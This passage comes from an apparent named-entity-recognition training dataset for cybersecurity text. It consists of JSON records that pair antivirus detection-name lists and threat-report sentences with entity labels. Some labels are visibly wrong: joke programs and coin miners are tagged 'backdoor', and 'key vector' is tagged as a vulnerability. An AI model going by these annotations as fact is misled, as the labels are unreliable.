Win32/Meciv.G W32/Trojan.PSSM-5626 TR/Meciv.15872 Trojan.Win32.Z.Meciv.15872[h] Win32.Trojan.Strat.Ebgt Trojan.Win32.Meciv W32/Meciv.G!tr Trojan.Win32.Meciv.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003207", "source": "cyner2_train"}} {"text": "A backdoor also known as: Other.Virus.[Trj]!c Trojan.O97M.Phish", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003208", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.F820 Trojan.AVKiller.AW Trojan/W32.Packer.24576.CE Trojan.Pakes Trojan.AVKiller.AW Trojan.AVKiller.AW Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.AVKiller.AW Trojan.Win32.Pakes.blv Trojan.AVKiller.AW Trojan.AVKiller.AW TrojWare.Win32.TrojanSpy.SpyEyes.B Trojan.MulDrop.8347 BehavesLike.Win32.RAHack.mc Backdoor.Win32.Kbot.aq Trojan.Pakes.bgg Trojan/Win32.Pakes Win32.Hack.RCryptor.a.10301 Trojan.Win32.Pakes.blv SScope.Malware-Cryptor.Hlux Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003209", "source": "cyner2_train"}} {"text": "Cyber criminals continue to use exploit kits to infect victims with ransomware but they also use MALSPAM emails to lure possible victims – a key vector into an enterprise environment that lacks the proper security controls, and one with insufficient information security training for end users.", "spans": {"THREAT_ACTOR: Cyber criminals": [[0, 15]], "MALWARE: exploit kits": [[32, 44]], "MALWARE: ransomware": [[68, 78]], "VULNERABILITY: key vector": [[141, 151]], "ORGANIZATION: enterprise environment": [[160, 182]], "SYSTEM: end users.": [[284, 294]]}, "info": {"id": "cyner2_train_003211", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Axload!O TrojanDownloader.Axload Trojan/Downloader.Axload.o TROJ_FRAUDLOA.TT Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downldr2.DOEJ TROJ_FRAUDLOA.TT Win.Downloader.66976-1 Trojan-Downloader.Win32.Axload.az Trojan.Win32.Axload.vqczl 
Trojan.Win32.Downloader.134456 TrojWare.Win32.Trojan.DNSChanger.~CRSE Trojan.DownLoader.59074 BehavesLike.Win32.Injector.ch W32/Downloader.HFNI-1674 TrojanDownloader.AxLoad.r SPR/Fake.C Trojan[Downloader]/Win32.Axload Troj.Downloader.W32.Axload.o!c Trojan-Downloader.Win32.Axload.az TrojanDownloader:Win32/Axload.A Trojan.BHORA.012841 Win32.Trojan-downloader.Axload.Dun Trojan.DL.Renos!Exa/gyOk4i0 Trojan-Downloader.Win32.Renos.AQ Win32/Trojan.Downloader.9f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003212", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.CoinMiner.S Trojan-Downloader.Win32.SetupFactory!O Trojan.Miner Application.CoinMiner.S Trojan.Win32.Z.Coinminer.938434 Troj.W32.Miner!c Application.CoinMiner.S Application.CoinMiner.S Tool.BtcMine.1149 W32/Trojan.FXQE-8469 Trojan/Win32.Vehidis Trojan:Win64/Stratumine.B Trojan.Vehidis Trj/CI.A Win32.Trojan.Miner.Alsn Win32/Trojan.Ransom.7fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003214", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Cerber.FA Ransom/W32.Cerber.561843.B Ransom.Cerber.S363870 Trojan.Ransom.Cerber.FA Trojan.Ransom.Cerber.FA Win32.Trojan.Kryptik.bin Ransom_HPCERBER.SMALY5A Win.Ransomware.Cerber-5970079-0 Trojan.Ransom.Cerber.FA Trojan.Ransom.Cerber.FA Trojan.Win32.Kryptik.eljryo Trojan.Ransom.Cerber.FA Trojan.Encoder.7453 Trojan.Kryptik.Win32.998775 Ransom_HPCERBER.SMALY5A BehavesLike.Win32.Ransomware.hh Trojan-Ransom.Cerber Trojan.Zerber.amh TR/Crypt.ZPACK.mblws Trojan[Ransom]/Win32.Zerber Trojan.Menti Ransom.Cerber Trojan.Zerber! 
Win32/Trojan.e14", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003216", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9771 Win.Worm.VBMania-1 Win32.Trojan.Visal.A Trojan.Win32.Swisyn.ajwe TrojWare.Win32.VB.YNB Trojan.MulDrop6.48042 Trojan/Swisyn.kkp Worm:Win32/Visal.A Trojan.Win32.Swisyn.ajwe Virus.Win32.Vbinder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003217", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.VB.Win32.85130 TrojanDownloader.VB Trojan-Downloader.Win32.VB.bkxc Trojan.DownLoader9.27791 TrojanDownloader.VB.dikm TrojanDownloader:Win32/Gurip.A Trojan.Heur.EE8DE0 Trojan-Downloader.Win32.VB.bkxc Trojan.Downloader.VB Trojan.DL.VB!q71Z8AF5llY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003218", "source": "cyner2_train"}} {"text": "The message was sent from an account created under her name on lesser known email provider 1 1's Mail.com, a common tactic in recent months, with a link to a file hosted on Dropbox and an additional credential phishing attempt.", "spans": {"SYSTEM: email provider": [[76, 90]], "ORGANIZATION: Dropbox": [[173, 180]], "THREAT_ACTOR: additional credential phishing": [[188, 218]]}, "info": {"id": "cyner2_train_003219", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TaskmanMispD.Trojan Worm/W32.Vobfus.217088 Worm.Win32.Vobfus!O Worm.Raideloz.A3 W32/Autorun.worm.aaeh W32/Vobfus.ahox WORM_VOBFUS.SMJA Win32.Worm.Pronny.dn WORM_VOBFUS.SMJA Win.Worm.Vobfus-12049 Worm.Win32.WBNA.ipa Trojan.Win32.Vobfus.cinarv Worm.Win32.A.Vobfus.155648.F WIN.Troj.Vobfus.lEaX Worm.Win32.Vobfus.AJR Win32.HLLW.Autoruner1.29632 BehavesLike.Win32.VBObfus.dm Worm/Vobfus.mos Worm:Win32/Raideloz.A Trojan.Barys.DA54 Worm.Win32.WBNA.ipa Worm/Win32.Vobfus.R43029 Worm.Vobfus Worm.Win32.Raideloz W32/VBObfus.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_003221", "source": "cyner2_train"}} {"text": "This report expands the Mexican investigation and shows how 10 Mexican journalists and human rights defenders, one minor child, and one United States citizen, were targeted with NSO's Exploit Framework.", "spans": {"ORGANIZATION: the Mexican investigation": [[20, 45]], "ORGANIZATION: Mexican journalists": [[63, 82]], "ORGANIZATION: human rights defenders, one minor child,": [[87, 127]], "ORGANIZATION: one United States citizen,": [[132, 158]], "MALWARE: NSO's Exploit Framework.": [[178, 202]]}, "info": {"id": "cyner2_train_003223", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.KillAV Worm.Win32.Delf.ag Packed.Win32.Klone.~KE Trojan.DownLoader.origin Trojan-Downloader.Win32.Delf!IK Trojan-Downloader.Win32.Delf W32/PEMask.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003224", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke/W32.BadJoke.20500 Hoax.Vb Hoax.Win32.BadJoke.VB.d Riskware.Win32.Anywork.hrys Joke.Miracle Tool.BadJoke.Win32.176 BehavesLike.Win32.PUP.mz Hoax.Win32.BadJoke.VB Hoax.BadJoke.djv HackTool[Hoax]/Win32.VB Win32.Joke.WorkJoke.a.kcloud Hoax.Win32.BadJoke.VB.d Joke:Win32/Small.NAO Unwanted/Win32.Badjoke.R100207 BadJoke.Win32.VB.d Trojan.VBRA.02296 Win32.Trojan-psw.Badjoke.Plui", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003225", "source": "cyner2_train"}} {"text": "Fake tax spam leads to malware:", "spans": {"MALWARE: malware:": [[23, 31]]}, "info": {"id": "cyner2_train_003226", "source": "cyner2_train"}} {"text": "On April 7th 2017 Haifei Li published on the McAfee blog1 about a Critical Office Zero-Day in the wild.", "spans": {"ORGANIZATION: Haifei Li": [[18, 27]], "ORGANIZATION: McAfee": [[45, 51]], "VULNERABILITY: Critical Office Zero-Day": [[66, 90]]}, "info": {"id": "cyner2_train_003229", "source": "cyner2_train"}} {"text": "Notice notice the use of the mistaken “ Word ” instead of “ 
World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled by the great enthusiasm , contribution and desire from all in attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances .", "spans": {"ORGANIZATION: Word Uyghur Congress ( WUC )": [[96, 124]], "ORGANIZATION: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "ORGANIZATION: Society for Threatened Peoples ( STP )": [[195, 233]]}, "info": {"id": "cyner2_train_003230", "source": "cyner2_train"}} {"text": "In February 2017, we found a new Ebury sample, that introduces a significant number of new features.", "spans": {"MALWARE: Ebury": [[33, 38]]}, "info": {"id": "cyner2_train_003231", "source": "cyner2_train"}} {"text": "We first discussed them in April 2015 when we witnessed them targeting a number of organizations in Japan.", "spans": {"ORGANIZATION: organizations": [[83, 96]]}, "info": {"id": "cyner2_train_003232", "source": "cyner2_train"}} {"text": "It is important to note that Adobe has released the bulletin APSB15-27 to address this vulnerability; the latest version of Flash 19.0.0.226 is no longer vulnerable.", "spans": {"ORGANIZATION: Adobe": [[29, 34]], "VULNERABILITY: vulnerability;": [[87, 101]], "SYSTEM: Flash 19.0.0.226": [[124, 140]]}, "info": {"id": "cyner2_train_003233", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Turla.aj BKDR_TAVDIG.ZGEJ-A Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Wipbot BKDR_TAVDIG.ZGEJ-A Troj.W32.Epiccosplay!c Win32.Backdoor.Wipbot.Ehhy 
BackDoor.Turla.52 Trojan.Turla.Win32.35 BehavesLike.Win32.Ramnit.cc Trojan.Win32.Turla BDS/WipBot.B.1 Trojan.Kazy.D6CC04 Backdoor:Win32/WipBot.B Trojan/Win32.Tavdig.C561133 Trojan.Turla!36kTMhU81bU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003238", "source": "cyner2_train"}} {"text": "This variation of the Trojan was also mentioned in the 2013 FireEye blogs about the Sunshop campaign 3 and operation ephemeral hydra 4.", "spans": {"MALWARE: Trojan": [[22, 28]], "ORGANIZATION: FireEye": [[60, 67]], "THREAT_ACTOR: Sunshop campaign": [[84, 100]], "THREAT_ACTOR: operation ephemeral hydra": [[107, 132]]}, "info": {"id": "cyner2_train_003240", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JSLP Trojan.Downloader.JSLP Adware.AdPeak Trojan/Downloader.Rottentu.a Trojan.Downloader.JSLP Win32.Trojan.WisdomEyes.151026.9950.9980 Adware.Crossid Win32/Tnega.LUdScAC not-a-virus:AdWare.Win32.AdPeak.dn Adware.W32.Adpeak!c Trojan.Downloader.JSLP Trojan.Downloader.JSLP Trojan.DownLoader16.16196 backdoor.win32.prorat.ah BehavesLike.Win32.Downloader.tc AdWare/AdPeak.ab GrayWare[AdWare:not-a-virus]/Win32.AdPeak Trojan.Downloader.JSLP TrojanDownloader:Win32/Tordow.A Adware/Win32.AdPeak.N1435735988 AdWare.AdPeak Trojan.Downloader.JSLP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003241", "source": "cyner2_train"}} {"text": "There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.", "spans": {"THREAT_ACTOR: Locky campaigns": [[28, 43]]}, "info": {"id": "cyner2_train_003242", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.TDSS!O RiskWare.Tool.CK Win32.Trojan.WisdomEyes.16070401.9500.9900 W32/PWStealerX.EGK TSPY_RAVEN.A Trojan-PSW.Win32.Raven.b Trojan.Win32.Raven.ewlguc TrojWare.Win32.Patched.KSU BackDoor.Uragan TSPY_RAVEN.A 
BehavesLike.Win32.Ransomware.nc W32/PWS.PQHC-6858 Trojan/PSW.Ravenpass.a PWS:Win32/Raven.C Trojan-PSW.Win32.Raven.b TrojanPSW.Raven Trojan.PWS.Raven!jl2h2OWvUG8 Trojan-Spy.Win32.Hsow", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003243", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Cendelf.A8 WS.Reputation.1 Delf.PVUB Win32/Tnega.CTAcCXD PE:Malware.Delf!6.F BackDoor.Bulknet.1078 TR/Spy.Browse.14364 Trojan/Win32.Cendelf Trojan-Dropper.Delf W32/Delff.RJH!tr Delf.ALTK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003244", "source": "cyner2_train"}} {"text": "Streamlining development makes financial sense for attackers, so the findings may imply a bigger trend towards industrialization that achieves an economy of scale.", "spans": {}, "info": {"id": "cyner2_train_003245", "source": "cyner2_train"}} {"text": "It turned out that they are also atypical by many means.", "spans": {}, "info": {"id": "cyner2_train_003246", "source": "cyner2_train"}} {"text": "We've identified 9,215 samples tagged Banload in AutoFocus since December 2013.", "spans": {"MALWARE: samples": [[23, 30]], "MALWARE: Banload": [[38, 45]], "SYSTEM: AutoFocus": [[49, 58]]}, "info": {"id": "cyner2_train_003247", "source": "cyner2_train"}} {"text": "Talos has observed a small email campaign leveraging the use of Microsoft Publisher files.", "spans": {"THREAT_ACTOR: small email campaign": [[21, 41]]}, "info": {"id": "cyner2_train_003248", "source": "cyner2_train"}} {"text": "This IOC contains indicators detailed in the whitepaper Hiding in Plain Sight: FireEye and Microsoft Expose Chinese APT Group's Obfuscation Tactic", "spans": {"ORGANIZATION: FireEye": [[79, 86]], "ORGANIZATION: Microsoft": [[91, 100]], "THREAT_ACTOR: Chinese APT Group's": [[108, 127]]}, "info": {"id": "cyner2_train_003252", "source": "cyner2_train"}} {"text": "Stumbled upon another one of the FakeAV's, its called Internet Security", "spans": {"MALWARE: 
FakeAV's,": [[33, 42]], "MALWARE: Internet Security": [[54, 71]]}, "info": {"id": "cyner2_train_003253", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Mauthy.g3 Win32.Trojan.WisdomEyes.151026.9950.9998 Heur.AdvML.C Trojan.Win32.DownLoader1.dklsld Trojan.Win32.Z.Kazy.1108582[h] Trojan.DownLoader4.60407 BehavesLike.Win32.SoftPulse.tc Trojan.Kazy.D103DE PWS:MSIL/Mauthy.A Trojan-PWS.MSIL PSW.ILUSpy Trj/CI.A Win32/Trojan.7d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003254", "source": "cyner2_train"}} {"text": "These .pub files are normally used for the publishing of documents such as newsletters, allowing users to create such documents using familiar office functions such as mail merging.", "spans": {"ORGANIZATION: newsletters,": [[75, 87]], "ORGANIZATION: documents": [[118, 127]], "SYSTEM: mail merging.": [[168, 181]]}, "info": {"id": "cyner2_train_003256", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9869 BackDoor.BlackEnergy.80 Worm:Win32/Phdet.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003257", "source": "cyner2_train"}} {"text": "By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.", "spans": {"MALWARE: fileless infection chain, the malware": [[26, 63]], "SYSTEM: sandbox,": [[106, 114]], "ORGANIZATION: anti-malware engineers": [[144, 166]]}, "info": {"id": "cyner2_train_003258", "source": "cyner2_train"}} {"text": "In cooperation with WeipTech, we have identified 92 samples of a new iOS malware family in the wild.", "spans": {"ORGANIZATION: WeipTech,": [[20, 29]], "MALWARE: iOS malware family": [[69, 87]]}, "info": {"id": "cyner2_train_003259", "source": "cyner2_train"}} {"text": "RetroTetris can be installed in Android versions starting from 2.3 Gingrebread while Brain Test can be installed in 
versions starting from 2.2 Froyo.", "spans": {"MALWARE: RetroTetris": [[0, 11]], "SYSTEM: Android versions": [[32, 48]], "SYSTEM: 2.3 Gingrebread": [[63, 78]], "MALWARE: Brain Test": [[85, 95]], "SYSTEM: 2.2 Froyo.": [[139, 149]]}, "info": {"id": "cyner2_train_003260", "source": "cyner2_train"}} {"text": "] net/mms.apk to view the message ” Once the APK package is downloaded , potential victims are urged to grant the malicious app a wide range of permissions on their Android device : App permissions SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Once installed , MazarBOT downloads a copy of Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number .", "spans": {"MALWARE: MazarBOT": [[388, 396]], "SYSTEM: Tor": [[417, 420]], "SYSTEM: Android": [[434, 441]]}, "info": {"id": "cyner2_train_003262", "source": "cyner2_train"}} {"text": "The malware mostly targets European users.", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: European users.": [[27, 42]]}, "info": {"id": "cyner2_train_003263", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9988 Trojan.Win32.Geratid.dklqgw Trojan.Msil Backdoor:MSIL/Geratid.A!dll", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003264", "source": "cyner2_train"}} {"text": "It was discovered in early 2014 and was named after a debug string, BlackMoon that was present in its code.", "spans": {"MALWARE: BlackMoon": [[68, 77]]}, "info": {"id": "cyner2_train_003268", "source": "cyner2_train"}} {"text": "Volexity recently identified a breach to the website of a well regarded media outlet in the country of Georgia.", "spans": {"ORGANIZATION: Volexity": [[0, 8]]}, "info": {"id": "cyner2_train_003269", "source": 
"cyner2_train"}} {"text": "From the latter half of May until June 10, there was a relative lull in TorrentLocker-related emails.", "spans": {}, "info": {"id": "cyner2_train_003270", "source": "cyner2_train"}} {"text": "This technique is being used to allow the attackers to conceal their secondary payloads, bypassing different AV products.", "spans": {"MALWARE: attackers": [[42, 51]], "MALWARE: payloads,": [[79, 88]], "SYSTEM: AV": [[109, 111]]}, "info": {"id": "cyner2_train_003274", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Nuclear Win32.Trojan.WisdomEyes.16070401.9500.9871 Trojan.Win32.Nuclear.baxsh Backdoor.Win32.Nuclear.182272 Backdoor.Win32.Nuclear.CU BackDoor.Nuclearat.452 Backdoor.Nuclear.Win32.1045 Backdoor.Win32.Nuclear Backdoor/Nuclear.yt Trojan[Backdoor]/Win32.Nuclear Backdoor.Nuclear Trojan.Zusy.Elzob.493 Win32/Nuclear.CU Backdoor.Nuclear!tPH0Q8Q37CQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003275", "source": "cyner2_train"}} {"text": "A backdoor also known as: Viking.GY TrojWare.Win32.Magania.~AD Trojan/Win32.Hupigon Trojan-PWS.Win32.Hangame.cl", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003276", "source": "cyner2_train"}} {"text": "Most recently, we observed several relatively large email campaigns distributing the Kronos banking Trojan.", "spans": {"THREAT_ACTOR: email campaigns": [[52, 67]], "MALWARE: Kronos banking Trojan.": [[85, 107]]}, "info": {"id": "cyner2_train_003277", "source": "cyner2_train"}} {"text": "This domain has been previously reported as an lSMAgent C2.", "spans": {}, "info": {"id": "cyner2_train_003278", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.CommInet.70741 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Exdis Trojan.Win32.Small.dqjffo MalCrypt.Indus! 
BackDoor.HangUp.44052 BehavesLike.Win32.Backdoor.kh Trojan[Backdoor]/Win32.CommInet Win32.Hack.Small.ak.kcloud Backdoor:Win32/Easydor.D Bck/CommInet.V Win32.Backdoor.Comminet.dbwh Backdoor.Win32.CommInet Exdis.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003280", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.RevengeRat.2 TROJ_REVETRAT.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat TROJ_REVETRAT.SM Win.Trojan.RevengeRat-6344273-0 BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.lm W32/Trojan.VQKC-8396 Backdoor:MSIL/Revetrat.A!bit Backdoor.RevetRat Trj/GdSda.A Win32/Trojan.961", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003283", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.StartPage.87040.B Trojan.Searmapxp.FC.384 Trojan.StartPage.MSIL Win32.Trojan.StartPage.ck Win.Trojan.Startpage-6834 Trojan.Win32.Startpage.fsfn Trojan.Win32.StartPage.dztahb Trojan.Win32.Z.Startpage.87040.FS Troj.W32.Startpage!c Win32.Trojan.Startpage.Szvb TrojWare.Win32.Startpage.KAX Trojan.Click3.12428 Trojan/StartPage.qbi Pua.Secure.Installer ADWARE/IERedirector.87040 Trojan/Win32.Startpage Trojan:Win32/Searmapxp.A!bit Trojan.Win32.Startpage.fsfn Adware/Win32.StartPage.R160955 Trojan.StartPage Trj/CI.A Trojan.Click!GCNxubkcTZg AdWare.IERedirector MSIL/StartPage.MI!tr Win32/Virus.Adware.007", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003285", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VBOverlayD.PE Trojan.Win32.Swisyn!O Trojan.Mofksys.A W32/Swisyn.ag Trojan/Swisyn.bner PE_MOFKSYS.A W32.Gosys Win32/VB.BOP PE_MOFKSYS.A Win.Virus.Sality:1-6335700-1 Troj.W32.Swisyn.tnEM Trojan/Swisyn.rmj Trojan/Win32.Swisyn.bner Trojan.Win32.Swisyn.bner Trojan/Win32.Swisyn.R1452 Trojan.Swisyn Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003287", "source": "cyner2_train"}} {"text": "The 
targets of these attacks appear to primarily be companies in the video games industry, although other targets may exist outside of our telemetry.", "spans": {"ORGANIZATION: companies": [[52, 61]], "ORGANIZATION: video games industry,": [[69, 90]], "ORGANIZATION: telemetry.": [[139, 149]]}, "info": {"id": "cyner2_train_003288", "source": "cyner2_train"}} {"text": "Unit 42 has observed a new version of Hworm or Houdini being used within multiple attacks.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Hworm": [[38, 43]], "MALWARE: Houdini": [[47, 54]]}, "info": {"id": "cyner2_train_003290", "source": "cyner2_train"}} {"text": "A backdoor also known as: HEUR:Trojan.AndroidOS.Piom.dzu Trojan.Android.Piom.expmgs a.privacy.dingwe Android.Spy.422.origin ANDROID/Piom.otvgv Trojan/Android.Piom HEUR:Trojan.AndroidOS.Piom.dzu Trojan.AndroidOS.Spy.D Trojan.AndroidOS.Dingwe Android/Fyec.DZS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003291", "source": "cyner2_train"}} {"text": "Samples and command and control hosts associated with the Imminent Monitor RAT", "spans": {"SYSTEM: hosts": [[32, 37]], "MALWARE: Imminent Monitor RAT": [[58, 78]]}, "info": {"id": "cyner2_train_003292", "source": "cyner2_train"}} {"text": "This strange behavior consisted of a large amount of peculiar files being written into sensitive system directories.", "spans": {}, "info": {"id": "cyner2_train_003294", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CoinMinerSimY.Worm Trojan.Multi Backdoor.Graybird TROJ_COINMINE.THAOIO Trojan.Win32.Miner.tidx Trojan.Win32.Miner.exakqc Trojan.Win32.S.CoinMiner.1312256 Uds.Dangerousobject.Multi!c Trojan.BtcMine.2100 TROJ_COINMINE.THAOIO BehavesLike.Win32.MultiPlug.tc PUA.EnigmaProtector Trojan.Miner.axs W32.Miner.Smominru TR/Crypt.Xpack.vknzu Trojan.Win32.Miner.tidx Trojan:Win32/Smominru.A Unwanted/Win32.BitCoinMiner.C2352839 Misc.Riskware.MoneroMiner Trojan.Miner RiskWare.BitCoinMiner Trj/CI.A 
Win32/CoinMiner.ALB Win32.Trojan.Miner.Dxct W32/CoinMiner.ALB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003296", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanClicker.MSIL Trojan.Win32.Clicker!BT TrojWare.MSIL.TrojanClicker.Lasdoma.NRJ Trojan.Click3.24925 Trojan.MSIL.TrojanClicker TrojanClicker.MSIL.mr TR/ATRAPS.hsvhb Trojan.Johnnie.DE2DE TrojanClicker:MSIL/Lasdoma.A!bit Win-Trojan/ADM01.Exp Trojan.Win32.Clicker!BT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003299", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pakes Trojan/Pakes.cxg Trojan.Heur.EAB04F Win32.Trojan.WisdomEyes.16070401.9500.9965 W32/Trojan2.BBCZ Win.Trojan.Pakes-1891 Trojan.Win32.Pakes.cxg Trojan.Win32.Pakes.buyldp Troj.W32.Pakes.cxg!c Trojan.DownLoader.61691 Trojan.Pakes.Win32.5440 BehavesLike.Win32.Dropper.lc Trojan.Win32.Crypt W32/Trojan.VJUA-2101 Trojan/Pakes.bvs Trojan/Win32.Pakes Win32.Troj.Unknown.kcloud Trojan.Win32.Pakes.cxg BScope.Trojan.MTA.01233 Trj/Pakes.EB Win32.Trojan.Pakes.Dygy Trojan.Pakes!elDwpuVaGqk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003300", "source": "cyner2_train"}} {"text": "W32.Futurax is a worm that spreads via removable drives and network shares.", "spans": {"MALWARE: worm": [[17, 21]], "SYSTEM: removable drives": [[39, 55]], "SYSTEM: network shares.": [[60, 75]]}, "info": {"id": "cyner2_train_003302", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win.Trojan.Dapato-413 Trojan.Win32.Dapato.bewyzt BackDoor.Cool.362 TR/Spy.289792.56 Win32.Troj.Undef.kcloud Dropper/Win32.Dapato Trojan-Downloader.win32.Delf.xoq Trojan-Dropper.Dapato.bauk Win32/Delf.OJW Trojan-Dropper.Win32.Dapato Delf.AJUR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003303", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O BehavesLike.Win32.BadFile.fc 
Trojan-Spy.Win32.AutoHK TR/Dldr.AutoHK.rguvg TrojanDownloader:MSIL/AutoHK.B!bit TrojanSpy.AutoHK Win32/TrojanDownloader.AutoHK.BC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003305", "source": "cyner2_train"}} {"text": "Pony will infect the victim computer and download an additional malware.", "spans": {"MALWARE: Pony": [[0, 4]], "SYSTEM: computer": [[28, 36]], "MALWARE: additional malware.": [[53, 72]]}, "info": {"id": "cyner2_train_003308", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Chekafe.A TROJ_DLOADR.SMOK Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Donloz.AQU TROJ_DLOADR.SMOK Trojan.Win32.Downloader.14836 Trojan.DownLoad2.12418 BehavesLike.Win32.Backdoor.lm Trojan-Downloader.Win32.Chekafe Win32.TrojDownloader.tb.kcloud TrojanDownloader:Win32/Chekafe.C BScope.Trojan.SvcHorse.01643", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003312", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.4102 TrojWare.Win32.CoinMiner.IEGT W32/Trojan.QGMZ-7351 Trojan.Heur.FU.EE0BC8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003313", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O W32/Trojan.HAUX-5531 Trojan.Win32.Fsysna.erxi Variant.Symmi.mCm9 BehavesLike.Win32.Downloader.tc Trojan/Blocker.idi TR/IRCBot.hjsna Trojan.Barys.DE0A3 Trojan.Win32.Z.Ircbot.1304576 Trojan.Win32.Fsysna.erxi Trojan:Win32/Fenibot.A Trojan/Win32.Inject.C860331 Win32/IRCBot.NIM Trojan.Kazy W32/IRCBot.NIM!tr Trj/CI.A Win32/Trojan.2d1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003314", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Fareit.FC.2719 Trojan.Zusy.D33BC8 Win32.Trojan.WisdomEyes.16070401.9500.9992 BehavesLike.Win32.Trojan.vc Trojan/Win32.Inject.C1663733 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 